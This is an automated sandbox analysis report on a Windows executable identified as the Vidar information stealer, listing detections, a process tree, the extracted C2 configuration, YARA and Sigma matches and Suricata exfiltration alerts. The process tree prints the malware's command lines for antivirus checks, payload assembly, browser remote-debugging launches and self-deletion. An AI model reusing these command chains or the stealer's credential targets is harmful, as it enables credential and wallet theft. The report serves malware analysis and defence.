Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ChoForgot.exe

Overview

General Information

Sample name:ChoForgot.exe
Analysis ID:1579962
MD5:06342512b7bcdfdda8d6ea8e2d5a24e4
SHA1:5a656ac27d5a03ee63f08dd499bacd01e0a12c3f
SHA256:89b55665c76315777e1f2a9a5be784fd2590b917388f657c6f5c2caa055e87c2
Tags:exeuser-Brad_malware
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Maps a DLL or memory area into another process
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ChoForgot.exe (PID: 1292 cmdline: "C:\Users\user\Desktop\ChoForgot.exe" MD5: 06342512B7BCDFDDA8D6EA8E2D5A24E4)
    • cmd.exe (PID: 4144 cmdline: "C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6684 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2128 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7036 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5424 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2680 cmdline: cmd /c md 623615 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 2752 cmdline: extrac32 /Y /E Distances MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 2136 cmdline: findstr /V "Duck" Ix MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1948 cmdline: cmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Wb.com (PID: 2744 cmdline: Wb.com f MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 6064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 5648 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2220,i,9483855011008134585,3632144003053426118,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • msedge.exe (PID: 6780 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
          • msedge.exe (PID: 1292 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=2552,i,9281795013285619816,5937589130455718843,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
        • cmd.exe (PID: 7380 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\MO8GVA1VKF37" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 5976 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 6568 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 3084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 7132 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6536 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 5660 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6584 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 7416 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 7452 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • msedge.exe (PID: 7692 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6896 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000003.2355126342.0000000001BE3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000C.00000003.2354948680.0000000001C70000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        0000000C.00000003.2354981968.0000000004C0A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              12.2.Wb.com.3d0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                12.2.Wb.com.3d0000.0.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
                • 0x2068c:$str01: MachineID:
                • 0x1f051:$str02: Work Dir: In memory
                • 0x206c3:$str03: [Hardware]
                • 0x20675:$str04: VideoCard:
                • 0x1fce5:$str05: [Processes]
                • 0x1fcf1:$str06: [Software]
                • 0x1f1bb:$str07: information.txt
                • 0x20398:$str08: %s\*
                • 0x203e5:$str08: %s\*
                • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                • 0x1fb61:$str12: UseMasterPassword
                • 0x206cf:$str13: Soft: WinSCP
                • 0x2016e:$str14: <Pass encoding="base64">
                • 0x206b2:$str15: Soft: FileZilla
                • 0x1f1ad:$str16: passwords.txt
                • 0x1fb8c:$str17: build_id
                • 0x1fc80:$str18: file_data

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Browser Started with Remote Debugging
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Wb.com f, ParentImage: C:\Users\user\AppData\Local\Temp\623615\Wb.com, ParentProcessId: 2744, ParentProcessName: Wb.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 6064, ProcessName: chrome.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Sigma detected: Search for Antivirus process
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4144, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5424, ProcessName: findstr.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:14:36.748679+010020442471Malware Command and Control Activity Detected188.245.216.205443192.168.2.649777TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:14:39.044497+010020518311Malware Command and Control Activity Detected188.245.216.205443192.168.2.649784TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:14:36.748415+010020490871A Network Trojan was detected192.168.2.649777188.245.216.205443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:14:32.128190+010028593781Malware Command and Control Activity Detected192.168.2.649765188.245.216.205443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 0000000C.00000003.2355126342.0000000001BE3000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.9% probability
                Source: ChoForgot.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49757 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.6:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49798 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49932 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50046 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50120 version: TLS 1.2
                Source: ChoForgot.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0101DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0101DC54
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0102A1E2
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0102A087
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_0102A570
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0101E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_0101E472
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FEC622 FindFirstFileExW,12_2_00FEC622
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_010266DC FindFirstFileW,FindNextFileW,FindClose,12_2_010266DC
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01027333 FindFirstFileW,FindClose,12_2_01027333
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_010273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_010273D4
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0101D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0101D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\623615\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\623615Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: chrome.exeMemory has grown: Private usage: 12MB later: 30MB

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.6:49777 -> 188.245.216.205:443
                Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.6:49765 -> 188.245.216.205:443
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.6:49777
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.6:49784
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 108.139.47.50 108.139.47.50
                Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102D95F InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,12_2_0102D95F
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b?rn=1734970511307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=264DEDAF8CF36A9502DCF8F18D816BBC&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b2?rn=1734970511307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=264DEDAF8CF36A9502DCF8F18D816BBC&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=11521cea2404b69b6674da71734970511; XID=11521cea2404b69b6674da71734970511
